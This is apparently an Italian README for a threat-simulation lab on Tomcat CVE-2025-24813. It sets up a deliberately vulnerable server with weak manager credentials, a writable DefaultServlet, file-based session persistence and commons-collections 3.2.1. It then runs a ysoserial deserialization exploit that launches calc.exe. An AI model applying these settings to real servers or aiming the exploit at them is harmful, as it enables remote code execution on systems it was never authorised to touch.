
Istruzioni per il deploy rapido di Tomcat v9.0.90 con java 25.0.1 2025-10-21 LTS su Windows Server 2019 Standard per ricercatori pigri.
Questo repository mira a fornire istruzioni chiare per il rapido dispiegamento di Tomcat v9.0.90 con java 25.0.1 2025-10-21 LTS su Windows Server 2019 Standard per un esercizio di simulazione di minacce di cybersicurezza. exploit.py sfrutta ysoserial-all.jar per creare un payload utilizzando il modulo CommonsCollections6 in ysoserial-all.jar, che viene poi deserializzato dalla dipendenza commons-collections-3.2.1.jar in %CATALINA_HOME%\webapps\ROOT\WEB-INF\lib.
Tomcat v9.0.90:Invoke-WebRequest -Uri "https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.90/bin/apache-tomcat-9.0.90-windows-x64.zip" -OutFile "apache-tomcat-9.0.90-windows-x64.zip"
Expand-Archive -Path "apache-tomcat-9.0.90-windows-x64.zip" -DestinationPath "C:\"
java 25.0.1 2025-10-21 LTS (versione ZIP):Invoke-WebRequest -Uri "https://download.oracle.com/java/25/archive/jdk-25_windows-x64_bin.zip" -OutFile "jdk-25_windows-x64_bin.zip"
Expand-Archive -Path "jdk-25_windows-x64_bin.zip" -DestinationPath "C:\"
mkdir C:\apache-tomcat-9.0.90\webapps\ROOT\WEB-INF\lib\
cd C:\apache-tomcat-9.0.90\webapps\ROOT\WEB-INF\lib\
Invoke-WebRequest -Uri "https://repo1.maven.org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar" -OutFile "commons-collections-3.2.1.jar"
1. Clicca su Start
2. Digita "modifica le variabili d'ambiente di sistema"
3. Crea due nuove variabili di sistema denominate
- `%JAVA_HOME%` con valore `C:\jdk-25.0.1`
- `%CATALINA_HOME%` con valore `C:\apache-tomcat-9.0.90`
4. Modifica la variabile di sistema denominata `Path` e aggiungi i seguenti valori:
- `%JAVA_HOME%\bin`
- `%CATALINA_HOME%\bin`
C:\apache-tomcat-9.0.90\bin\service.bat install Tomcat9Server
Set-Service -Name "Tomcat9Server" -StartupType Automatic
Start-Service -Name "Tomcat9Server"
tomcat-users.xml nella cartella tomcat-9.0.90\conf e aggiungi quanto segue PRIMA di </tomcat-users>:<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
context.xml nella cartella tomcat-9.0.90\conf e sostituisci TUTTO il contenuto con il seguente:<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!-- The contents of this file will be loaded for each web application -->
<Context>
<Manager className="org.apache.catalina.session.PersistentManager" maxIdleBackup="1" saveOnRestart="true" processExpiresFrequency="1">
<Store className="org.apache.catalina.session.FileStore"/>
</Manager>
</Context>
web.xml nella cartella tomcat-9.0.90\conf, cerca DefaultServlet e sostituisci l'intero <servlet></servlet> con il seguente:<servlet>
<servlet-name>default</servlet-name>
<servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>listings</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
shutdown.bat
startup.bat
New-NetFirewallRule -DisplayName "Tomcat9Server" -Direction Inbound -Protocol TCP -LocalPort 8080 -Action Allow
index.html dall'aspetto legittimo in C:\tomcat-9.0.90\webapps\ROOT per renderlo più accattivante.<Connector port="443"
protocol="org.apache.coyote.http11.Http11NioProtocol"
maxThreads="150"
SSLEnabled="true"
scheme="https"
secure="true">
<SSLHostConfig>
<Certificate certificateKeystoreFile="C:\tomcat-9.0.90\conf\ssl\cert.pfx"
certificateKeystorePassword=""
certificateKeystoreType="PKCS12" />
</SSLHostConfig>
</Connector>
New-NetFirewallRule -DisplayName "Tomcat9HTTPSServer" -Direction Inbound -Protocol TCP -LocalPort 443 -Action Allow
exploit.pygit clone <this-repo-url>
cd CVE-2025-24813
pip install requests
java --version
curl -L -o ysoserial-all.jar https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
python exploit.py -t http://<target IP>:8080/ -c "cmd.exe /c calc.exe"
exploit.py, verranno creati due file di sessione in C:\tomcat-9.0.90\webapps\ROOT e C:\tomcat-9.0.90\work\Catalina\localhost\ROOT con un nome casuale. Il file .session nella cartella work dovrebbe essere eliminato pochi secondi dopo l'esecuzione.